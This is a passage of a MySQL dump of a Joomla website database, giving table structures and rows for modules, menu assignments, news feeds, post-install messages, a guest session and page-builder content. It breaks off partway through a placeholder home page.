\",\"portal_mode_frontpage_image_overlay_text_limit\":\"100\",\"portal_mode_frontpage_image_overlay_readon\":\"1\",\"portal_mode_frontpage_image_overlay_readon_text\":\"\",\"portal_mode_highlights_readmore\":\"\",\"portal_mode_highlights_amount\":\"7\",\"portal_mode_highlights_date_format\":\"\",\"portal_mode_highlights_title_limit_type\":\"chars\",\"portal_mode_highlights_title_limit\":\"40\",\"portal_mode_video_gallery_popup\":\"1\",\"portal_mode_video_gallery_popup_x\":\"640\",\"portal_mode_video_gallery_popup_y\":\"480\",\"portal_mode_video_gallery_pages\":\"2\",\"portal_mode_video_gallery_per_page\":\"3\",\"portal_mode_video_gallery_title_limit_type\":\"chars\",\"portal_mode_video_gallery_title_limit\":\"40\",\"portal_mode_video_gallery_text_limit_type\":\"chars\",\"portal_mode_video_gallery_text_limit\":\"60\",\"portal_mode_video_gallery_autoanimation\":\"5000\",\"portal_mode_video_list_popup\":\"1\",\"portal_mode_video_list_popup_x\":\"640\",\"portal_mode_video_list_popup_y\":\"480\",\"portal_mode_video_list_pages\":\"2\",\"portal_mode_video_list_per_page\":\"3\",\"portal_mode_video_list_title\":\"1\",\"portal_mode_video_list_date\":\"1\",\"portal_mode_video_list_title_limit_type\":\"chars\",\"portal_mode_video_list_title_limit\":\"40\",\"portal_mode_events_list_cols\":\"2\",\"portal_mode_events_list_rows\":\"2\",\"portal_mode_jomsocial_photos_total\":\"8\",\"portal_mode_jomsocial_photos_amount\":\"4\",\"portal_mode_jomsocial_photos_width\":\"310\",\"portal_mode_jomsocial_photos_animation\":\"0\",\"portal_mode_grid_news_cols\":\"2\",\"portal_mode_grid_news_rows\":\"2\",\"portal_mode_grid_news_title_length\":\"40\",\"portal_mode_grid_news_title_length_type\":\"chars\",\"portal_mode_grid_news_date_format\":\"f J, Y\",\"portal_mode_grid_news_text_length\":\"40\",\"portal_mode_grid_news_text_length_type\":\"chars\",\"portal_mode_grid_news_url\":\"\",\"portal_mode_grid_news_link_text\":\"Find more news\",\"portal_mode_portfolio_grid_amount\":\"20\",\"portal_mode_portfolio_grid_cols\":\"5\",\"portal_mode_portfolio_grid_cols_small_desktop\":\"4\",\"portal_mode_portfolio_grid_cols_tablet\":\"3\",\"portal_mode_portfolio_grid_cols_small_tablet\":\"2\",\"portal_mode_portfolio_grid_cols_mobile\":\"1\",\"portal_mode_portfolio_grid_title_length\":\"40\",\"portal_mode_portfolio_grid_title_length_type\":\"chars\",\"portal_mode_portfolio_grid_title_link\":\"1\",\"portal_mode_portfolio_grid_overlay\":\"1\",\"portal_mode_portfolio_grid_popup\":\"1\",\"portal_mode_portfolio_grid_date_format\":\"f J, Y\",\"portal_mode_portfolio_grid_author\":\"1\",\"portal_mode_news_slider_amount\":\"5\",\"portal_mode_news_slider_title\":\"1\",\"portal_mode_news_slider_text\":\"1\",\"portal_mode_news_slider_date\":\"1\",\"portal_mode_news_slider_date_format\":\"j F\",\"portal_mode_news_slider_autoanimation_time\":\"3000\",\"portal_mode_news_slider_image_margin\":\"-30% 0\",\"portal_mode_news_slider_label\":\"\",\"portal_mode_news_slider_category_label\":\"\",\"portal_mode_bikestore_slider_amount\":\"8\",\"portal_mode_bikestore_slider_speed\":\"3500\",\"portal_mode_bikestore_slider_autoanim\":\"0\",\"news_full_pages\":\"1\",\"news_column\":\"3\",\"news_rows\":\"2\",\"top_interface_style\":\"none\",\"open_links_window\":\"_self\",\"news_content_header_pos\":\"left\",\"news_content_header_float\":\"none\",\"news_header_link\":\"0\",\"news_header_first_word\":\"0\",\"use_title_alias\":\"0\",\"title_limit_type\":\"chars\",\"title_limit\":\"40\",\"news_content_image_pos\":\"left\",\"news_content_image_float\":\"left\",\"news_image_link\":\"1\",\"news_image_modal\":\"0\",\"news_content_text_pos\":\"left\",\"news_content_text_float\":\"left\",\"news_text_link\":\"0\",\"news_limit_type\":\"chars\",\"news_limit\":\"220\",\"clean_xhtml\":\"1\",\"allowed_tags\":\"\",\"more_text_value\":\"...\",\"readmore_text\":\"\",\"parse_plugins\":\"0\",\"clean_plugins\":\"0\",\"news_content_info_pos\":\"left\",\"news_content_info_float\":\"none\",\"news_content_info2_pos\":\"left\",\"news_content_info2_float\":\"left\",\"info_format\":\"%DATE %HITS %CATEGORY %AUTHOR\",\"info2_format\":\"\",\"category_link\":\"0\",\"date_format\":\"d-m-Y\",\"date_publish\":\"0\",\"username\":\"users.name\",\"user_avatar\":\"0\",\"avatar_size\":\"16\",\"art_padding\":\"40px\",\"news_header_order\":\"2\",\"news_header_enabled\":\"0\",\"news_image_order\":\"1\",\"news_image_enabled\":\"1\",\"news_text_order\":\"3\",\"news_text_enabled\":\"1\",\"news_info_order\":\"4\",\"news_info_enabled\":\"0\",\"news_info2_order\":\"5\",\"news_info2_enabled\":\"0\",\"news_content_readmore_pos\":\"left\",\"news_readmore_enabled\":\"1\",\"news_short_pages\":\"3\",\"links_amount\":\"3\",\"links_columns_amount\":\"1\",\"links_image\":\"0\",\"links_readmore\":\"0\",\"bottom_interface_style\":\"arrows_with_pagination\",\"links_margin\":\"0\",\"links_position\":\"bottom\",\"links_width\":\"50\",\"list_title_limit_type\":\"words\",\"list_title_limit\":\"20\",\"list_text_limit_type\":\"words\",\"list_text_limit\":\"30\",\"links_title\":\"0\",\"links_title_url\":\"\",\"links_title_label\":\"\",\"responsive_images\":\"1\",\"wrap_content\":\"0\",\"memory_limit\":\"128M\",\"use_curl_download\":\"0\",\"create_thumbs\":\"1\",\"img_auto_scale\":\"0\",\"img_keep_aspect_ratio\":\"1\",\"img_width\":\"350\",\"img_height\":\"243\",\"img_margin\":\"0 0 20px 0\",\"links_img_width\":\"160\",\"links_img_height\":\"120\",\"links_img_margin\":\"6px 14px 0 0\",\"img_bg\":\"#000000\",\"img_stretch\":\"0\",\"img_quality\":\"95\",\"thumbs_cache_time\":\"0\",\"simple_crop_top\":\"0\",\"simple_crop_bottom\":\"0\",\"simple_crop_left\":\"0\",\"simple_crop_right\":\"0\",\"crop_rules\":\"\",\"grayscale_filter\":\"0\",\"sepia_filter\":\"0\",\"blur_filter\":\"0\",\"brightness_filter\":\"0\",\"smooth_filter\":\"0\",\"pixelate_filter\":\"0\",\"contrast_filter\":\"0\",\"filter_arg\":\"0\",\"autoanim\":\"0\",\"hover_anim\":\"0\",\"animation_speed\":\"400\",\"animation_interval\":\"5000\",\"animation_function\":\"Fx.Transitions.Expo.easeIn\",\"useCSS\":\"1\",\"useScript\":\"2\",\"engine_mode\":\"jquery\",\"include_jquery\":\"0\",\"url_overrides\":\"0\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(120,244,'Contact Form','','',1,'bottom4',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_breezingforms',1,0,'{\"ff_mod_name\":\"Contact\",\"ff_mod_page\":\"1\",\"ff_mod_editable\":\"0\",\"ff_mod_editable_override\":\"0\",\"ff_mod_frame\":\"0\",\"ff_mod_border\":\"0\",\"ff_mod_align\":\"1\",\"ff_mod_left\":\"0\",\"ff_mod_top\":\"0\",\"ff_mod_parprv\":\"\",\"ff_mod_parpub\":\"\",\"moduleclass_sfx\":\"\",\"owncache\":\"0\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*');
/*!40000 ALTER TABLE `atlyh_modules` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_modules_menu`
--
DROP TABLE IF EXISTS `atlyh_modules_menu`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_modules_menu` (
`moduleid` int(11) NOT NULL DEFAULT 0,
`menuid` int(11) NOT NULL DEFAULT 0,
PRIMARY KEY (`moduleid`,`menuid`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_modules_menu`
--
LOCK TABLES `atlyh_modules_menu` WRITE;
/*!40000 ALTER TABLE `atlyh_modules_menu` DISABLE KEYS */;
INSERT INTO `atlyh_modules_menu` VALUES (1,101),(2,0),(3,0),(4,0),(6,0),(7,0),(8,0),(9,0),(10,0),(12,0),(13,0),(14,0),(15,0),(17,0),(20,0),(22,234),(22,238),(22,242),(22,243),(22,244),(22,296),(22,399),(22,400),(25,294),(26,-463),(26,-462),(26,-433),(26,-432),(26,-431),(26,-430),(26,-429),(26,-427),(26,-400),(26,-399),(26,-296),(26,-244),(26,-243),(26,-242),(26,-238),(26,-234),(32,309),(35,0),(45,303),(57,238),(57,427),(57,429),(57,430),(57,431),(57,432),(57,433),(57,462),(57,463),(79,0),(86,0),(87,238),(87,427),(87,429),(87,430),(87,431),(87,432),(87,433),(87,462),(87,463),(94,0),(95,0),(96,0),(97,0),(99,492),(100,492),(101,492),(102,493),(103,493),(104,493),(105,0),(111,0),(116,0),(117,0),(118,0),(119,481),(119,482),(119,483),(119,484),(119,528),(119,544),(119,545),(120,0);
/*!40000 ALTER TABLE `atlyh_modules_menu` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_newsfeeds`
--
DROP TABLE IF EXISTS `atlyh_newsfeeds`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_newsfeeds` (
`catid` int(11) NOT NULL DEFAULT 0,
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`name` varchar(100) NOT NULL DEFAULT '',
`alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '',
`link` varchar(200) NOT NULL DEFAULT '',
`published` tinyint(1) NOT NULL DEFAULT 0,
`numarticles` int(10) unsigned NOT NULL DEFAULT 1,
`cache_time` int(10) unsigned NOT NULL DEFAULT 3600,
`checked_out` int(10) unsigned NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`ordering` int(11) NOT NULL DEFAULT 0,
`rtl` tinyint(4) NOT NULL DEFAULT 0,
`access` int(10) unsigned NOT NULL DEFAULT 0,
`language` char(7) NOT NULL DEFAULT '',
`params` text NOT NULL,
`created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`created_by` int(10) unsigned NOT NULL DEFAULT 0,
`created_by_alias` varchar(255) NOT NULL DEFAULT '',
`modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`modified_by` int(10) unsigned NOT NULL DEFAULT 0,
`metakey` text NOT NULL,
`metadesc` text NOT NULL,
`metadata` text NOT NULL,
`xreference` varchar(50) NOT NULL COMMENT 'A reference to enable linkages to external data sets.',
`publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`description` text NOT NULL,
`version` int(10) unsigned NOT NULL DEFAULT 1,
`hits` int(10) unsigned NOT NULL DEFAULT 0,
`images` text NOT NULL,
PRIMARY KEY (`id`),
KEY `idx_access` (`access`),
KEY `idx_checkout` (`checked_out`),
KEY `idx_state` (`published`),
KEY `idx_catid` (`catid`),
KEY `idx_createdby` (`created_by`),
KEY `idx_language` (`language`),
KEY `idx_xreference` (`xreference`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_newsfeeds`
--
LOCK TABLES `atlyh_newsfeeds` WRITE;
/*!40000 ALTER TABLE `atlyh_newsfeeds` DISABLE KEYS */;
INSERT INTO `atlyh_newsfeeds` VALUES (17,1,'Joomla! Announcements','joomla-announcements','http://feeds.joomla.org/JoomlaAnnouncements',1,5,3600,0,'0000-00-00 00:00:00',1,1,1,'en-GB','{\"show_feed_image\":\"\",\"show_feed_description\":\"\",\"show_item_description\":\"\",\"feed_character_count\":\"0\",\"newsfeed_layout\":\"\",\"feed_display_order\":\"\"}','2011-01-01 00:00:01',692,'Joomla','0000-00-00 00:00:00',0,'','','{\"robots\":\"\",\"rights\":\"\"}','','0000-00-00 00:00:00','0000-00-00 00:00:00','',1,1,''),(17,2,'New Joomla! Extensions','new-joomla-extensions','http://feeds.joomla.org/JoomlaExtensions',1,5,3600,0,'0000-00-00 00:00:00',4,1,1,'en-GB','{\"show_feed_image\":\"\",\"show_feed_description\":\"\",\"show_item_description\":\"\",\"feed_character_count\":\"0\",\"newsfeed_layout\":\"\",\"feed_display_order\":\"\"}','2011-01-01 00:00:01',692,'Joomla','0000-00-00 00:00:00',0,'','','{\"robots\":\"\",\"rights\":\"\"}','','0000-00-00 00:00:00','0000-00-00 00:00:00','',1,0,''),(17,3,'Joomla! Security News','joomla-security-news','http://feeds.joomla.org/JoomlaSecurityNews',1,5,3600,0,'0000-00-00 00:00:00',2,1,1,'en-GB','{\"show_feed_image\":\"\",\"show_feed_description\":\"\",\"show_item_description\":\"\",\"feed_character_count\":\"0\",\"newsfeed_layout\":\"\",\"feed_display_order\":\"\"}','2011-01-01 00:00:01',692,'Joomla','0000-00-00 00:00:00',0,'','','{\"robots\":\"\",\"rights\":\"\"}','','0000-00-00 00:00:00','0000-00-00 00:00:00','',1,0,''),(17,4,'Joomla! Connect','joomla-connect','http://feeds.joomla.org/JoomlaConnect',1,5,3600,0,'0000-00-00 00:00:00',3,1,1,'en-GB','{\"show_feed_image\":\"\",\"show_feed_description\":\"\",\"show_item_description\":\"\",\"feed_character_count\":\"0\",\"newsfeed_layout\":\"\",\"feed_display_order\":\"\"}','2011-01-01 00:00:01',692,'Joomla','0000-00-00 00:00:00',0,'','','{\"robots\":\"\",\"rights\":\"\"}','','0000-00-00 00:00:00','0000-00-00 00:00:00','',1,2,'');
/*!40000 ALTER TABLE `atlyh_newsfeeds` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_oneclickaction_actions`
--
DROP TABLE IF EXISTS `atlyh_oneclickaction_actions`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_oneclickaction_actions` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`userid` bigint(20) unsigned NOT NULL,
`actionurl` varchar(4000) NOT NULL,
`otp` char(64) NOT NULL,
`expiry` datetime NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_oneclickaction_actions`
--
LOCK TABLES `atlyh_oneclickaction_actions` WRITE;
/*!40000 ALTER TABLE `atlyh_oneclickaction_actions` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_oneclickaction_actions` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_overrider`
--
DROP TABLE IF EXISTS `atlyh_overrider`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_overrider` (
`id` int(10) NOT NULL AUTO_INCREMENT COMMENT 'Primary Key',
`constant` varchar(255) NOT NULL,
`string` text NOT NULL,
`file` varchar(255) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_overrider`
--
LOCK TABLES `atlyh_overrider` WRITE;
/*!40000 ALTER TABLE `atlyh_overrider` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_overrider` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_postinstall_messages`
--
DROP TABLE IF EXISTS `atlyh_postinstall_messages`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_postinstall_messages` (
`postinstall_message_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`extension_id` bigint(20) NOT NULL DEFAULT 700 COMMENT 'FK to #__extensions',
`title_key` varchar(255) NOT NULL DEFAULT '' COMMENT 'Lang key for the title',
`description_key` varchar(255) NOT NULL DEFAULT '' COMMENT 'Lang key for description',
`action_key` varchar(255) NOT NULL DEFAULT '',
`language_extension` varchar(255) NOT NULL DEFAULT 'com_postinstall' COMMENT 'Extension holding lang keys',
`language_client_id` tinyint(3) NOT NULL DEFAULT 1,
`type` varchar(10) NOT NULL DEFAULT 'link' COMMENT 'Message type - message, link, action',
`action_file` varchar(255) DEFAULT '' COMMENT 'RAD URI to the PHP file containing action method',
`action` varchar(255) DEFAULT '' COMMENT 'Action method name or URL',
`condition_file` varchar(255) DEFAULT NULL COMMENT 'RAD URI to file holding display condition method',
`condition_method` varchar(255) DEFAULT NULL COMMENT 'Display condition method, must return boolean',
`version_introduced` varchar(50) NOT NULL DEFAULT '3.2.0' COMMENT 'Version when this message was introduced',
`enabled` tinyint(3) NOT NULL DEFAULT 1,
PRIMARY KEY (`postinstall_message_id`)
) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_postinstall_messages`
--
LOCK TABLES `atlyh_postinstall_messages` WRITE;
/*!40000 ALTER TABLE `atlyh_postinstall_messages` DISABLE KEYS */;
INSERT INTO `atlyh_postinstall_messages` VALUES (1,700,'PLG_TWOFACTORAUTH_TOTP_POSTINSTALL_TITLE','PLG_TWOFACTORAUTH_TOTP_POSTINSTALL_BODY','PLG_TWOFACTORAUTH_TOTP_POSTINSTALL_ACTION','plg_twofactorauth_totp',1,'action','site://plugins/twofactorauth/totp/postinstall/actions.php','twofactorauth_postinstall_action','site://plugins/twofactorauth/totp/postinstall/actions.php','twofactorauth_postinstall_condition','3.2.0',1),(2,700,'COM_CPANEL_MSG_EACCELERATOR_TITLE','COM_CPANEL_MSG_EACCELERATOR_BODY','COM_CPANEL_MSG_EACCELERATOR_BUTTON','com_cpanel',1,'action','admin://components/com_admin/postinstall/eaccelerator.php','admin_postinstall_eaccelerator_action','admin://components/com_admin/postinstall/eaccelerator.php','admin_postinstall_eaccelerator_condition','3.2.0',1),(3,700,'COM_CPANEL_WELCOME_BEGINNERS_TITLE','COM_CPANEL_WELCOME_BEGINNERS_MESSAGE','','com_cpanel',1,'message','','','','','3.2.0',1),(4,700,'COM_CPANEL_MSG_PHPVERSION_TITLE','COM_CPANEL_MSG_PHPVERSION_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/phpversion.php','admin_postinstall_phpversion_condition','3.2.2',1),(5,700,'COM_CPANEL_MSG_HTACCESS_TITLE','COM_CPANEL_MSG_HTACCESS_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/htaccess.php','admin_postinstall_htaccess_condition','3.4.0',1),(6,700,'COM_CPANEL_MSG_ROBOTS_TITLE','COM_CPANEL_MSG_ROBOTS_BODY','','com_cpanel',1,'message','','','','','3.3.0',1),(7,700,'COM_CPANEL_MSG_LANGUAGEACCESS340_TITLE','COM_CPANEL_MSG_LANGUAGEACCESS340_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/languageaccess340.php','admin_postinstall_languageaccess340_condition','3.4.1',1),(8,10016,'COM_ADMINTOOLS_POSTSETUP_LBL_ACCEPTLICENSE','COM_ADMINTOOLS_POSTSETUP_DESC_ACCEPTLICENSE','COM_ADMINTOOLS_POSTSETUP_BTN_I_CONFIRM_THIS','com_admintools',1,'message','','','','','3.1.2',1),(9,10016,'COM_ADMINTOOLS_POSTSETUP_LBL_ACCEPTSUPPORT','COM_ADMINTOOLS_POSTSETUP_DESC_ACCEPTSUPPORT','COM_ADMINTOOLS_POSTSETUP_BTN_I_CONFIRM_THIS','com_admintools',1,'message','','','','','3.1.2',1);
/*!40000 ALTER TABLE `atlyh_postinstall_messages` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_redirect_links`
--
DROP TABLE IF EXISTS `atlyh_redirect_links`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_redirect_links` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`old_url` varchar(255) NOT NULL,
`new_url` varchar(255) DEFAULT NULL,
`referer` varchar(150) NOT NULL,
`comment` varchar(255) NOT NULL,
`hits` int(10) unsigned NOT NULL DEFAULT 0,
`published` tinyint(4) NOT NULL,
`created_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`modified_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`header` smallint(3) NOT NULL DEFAULT 301,
PRIMARY KEY (`id`),
UNIQUE KEY `idx_link_old` (`old_url`),
KEY `idx_link_modifed` (`modified_date`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_redirect_links`
--
LOCK TABLES `atlyh_redirect_links` WRITE;
/*!40000 ALTER TABLE `atlyh_redirect_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_redirect_links` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_schemas`
--
DROP TABLE IF EXISTS `atlyh_schemas`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_schemas` (
`extension_id` int(11) NOT NULL,
`version_id` varchar(20) NOT NULL,
PRIMARY KEY (`extension_id`,`version_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_schemas`
--
LOCK TABLES `atlyh_schemas` WRITE;
/*!40000 ALTER TABLE `atlyh_schemas` DISABLE KEYS */;
INSERT INTO `atlyh_schemas` VALUES (700,'3.4.0-2015-02-26'),(10039,'2.0');
/*!40000 ALTER TABLE `atlyh_schemas` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_session`
--
DROP TABLE IF EXISTS `atlyh_session`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_session` (
`session_id` varchar(200) NOT NULL DEFAULT '',
`client_id` tinyint(3) unsigned NOT NULL DEFAULT 0,
`guest` tinyint(4) unsigned DEFAULT 1,
`time` varchar(14) DEFAULT '',
`data` mediumtext DEFAULT NULL,
`userid` int(11) DEFAULT 0,
`username` varchar(150) DEFAULT '',
PRIMARY KEY (`session_id`),
KEY `userid` (`userid`),
KEY `time` (`time`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_session`
--
LOCK TABLES `atlyh_session` WRITE;
/*!40000 ALTER TABLE `atlyh_session` DISABLE KEYS */;
INSERT INTO `atlyh_session` VALUES ('5d74d9dcfe8c4b897975b1a7783033ee',0,1,'1458226083','__default|a:8:{s:15:\"session.counter\";i:29;s:19:\"session.timer.start\";i:1458226032;s:18:\"session.timer.last\";i:1458226082;s:17:\"session.timer.now\";i:1458226083;s:22:\"session.client.browser\";s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:45.0) Gecko/20100101 Firefox/45.0\";s:8:\"registry\";O:24:\"Joomla\\Registry\\Registry\":2:{s:7:\"\\0\\0\\0data\";O:8:\"stdClass\":0:{}s:9:\"separator\";s:1:\".\";}s:4:\"user\";O:5:\"JUser\":26:{s:9:\"\\0\\0\\0isRoot\";b:0;s:2:\"id\";i:0;s:4:\"name\";N;s:8:\"username\";N;s:5:\"email\";N;s:8:\"password\";N;s:14:\"password_clear\";s:0:\"\";s:5:\"block\";N;s:9:\"sendEmail\";i:0;s:12:\"registerDate\";N;s:13:\"lastvisitDate\";N;s:10:\"activation\";N;s:6:\"params\";N;s:6:\"groups\";a:1:{i:0;s:1:\"1\";}s:5:\"guest\";i:1;s:13:\"lastResetTime\";N;s:10:\"resetCount\";N;s:12:\"requireReset\";N;s:10:\"\\0\\0\\0_params\";O:24:\"Joomla\\Registry\\Registry\":2:{s:7:\"\\0\\0\\0data\";O:8:\"stdClass\":0:{}s:9:\"separator\";s:1:\".\";}s:14:\"\\0\\0\\0_authGroups\";a:1:{i:0;i:1;}s:14:\"\\0\\0\\0_authLevels\";a:2:{i:0;i:1;i:1;i:1;}s:15:\"\\0\\0\\0_authActions\";N;s:12:\"\\0\\0\\0_errorMsg\";N;s:13:\"\\0\\0\\0userHelper\";O:18:\"JUserWrapperHelper\":0:{}s:10:\"\\0\\0\\0_errors\";a:0:{}s:3:\"aid\";i:0;}s:13:\"session.token\";s:32:\"5f8746c442f40fcd0d0b2882b05a1efe\";}',0,'');
/*!40000 ALTER TABLE `atlyh_session` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_spmedia`
--
DROP TABLE IF EXISTS `atlyh_spmedia`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_spmedia` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(255) NOT NULL,
`path` varchar(255) NOT NULL,
`thumb` varchar(255) NOT NULL,
`alt` varchar(255) NOT NULL,
`caption` varchar(2048) NOT NULL,
`description` mediumtext NOT NULL,
`type` varchar(100) NOT NULL DEFAULT 'image',
`extension` varchar(100) NOT NULL,
`created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`created_by` bigint(20) NOT NULL DEFAULT 0,
`modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`modified_by` bigint(20) NOT NULL DEFAULT 0,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_spmedia`
--
LOCK TABLES `atlyh_spmedia` WRITE;
/*!40000 ALTER TABLE `atlyh_spmedia` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_spmedia` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_sppagebuilder`
--
DROP TABLE IF EXISTS `atlyh_sppagebuilder`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_sppagebuilder` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(255) NOT NULL,
`alias` varchar(255) NOT NULL DEFAULT '',
`text` mediumtext NOT NULL,
`published` tinyint(3) NOT NULL DEFAULT 1,
`catid` int(10) NOT NULL,
`access` int(10) NOT NULL DEFAULT 0,
`ordering` int(11) NOT NULL,
`created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`created_user_id` bigint(20) NOT NULL DEFAULT 0,
`modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`modified_user_id` bigint(20) NOT NULL DEFAULT 0,
`og_title` varchar(255) NOT NULL,
`og_image` varchar(255) NOT NULL,
`og_description` varchar(255) NOT NULL,
`page_layout` varchar(55) DEFAULT NULL,
`language` char(7) NOT NULL,
`hits` bigint(20) NOT NULL DEFAULT 0,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=9 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_sppagebuilder`
--
LOCK TABLES `atlyh_sppagebuilder` WRITE;
/*!40000 ALTER TABLE `atlyh_sppagebuilder` DISABLE KEYS */;
INSERT INTO `atlyh_sppagebuilder` VALUES (1,'Home','home','[{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"title\":\"\",\"heading_selector\":\"h1\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"title_position\":\"sppb-text-center\",\"background_color\":\"\",\"color\":\"\",\"background_image\":\"images/feature-bg1.jpg\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_attachment\":\"inherit\",\"background_position\":\"50% 50%\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"170px 0\",\"margin\":\"\",\"fullscreen\":0},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeInUp\",\"animationduration\":500,\"animationdelay\":300,\"class\":\"\"},\"attr\":[{\"name\":\"call_to_action\",\"title\":\"Call to Action\",\"atts\":{\"title\":\"HELIX3 FRAMEWORK\",\"heading_selector\":\"h1\",\"title_fontsize\":\"72\",\"title_text_color\":\"#ffffff\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"20\",\"subtitle\":\"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore. sed do eiusmod tempor incididunt ut labore et dolore\",\"subtitle_fontsize\":\"18\",\"subtitle_text_color\":\"#ffffff\",\"text\":\"\",\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"button_text\":\"Download 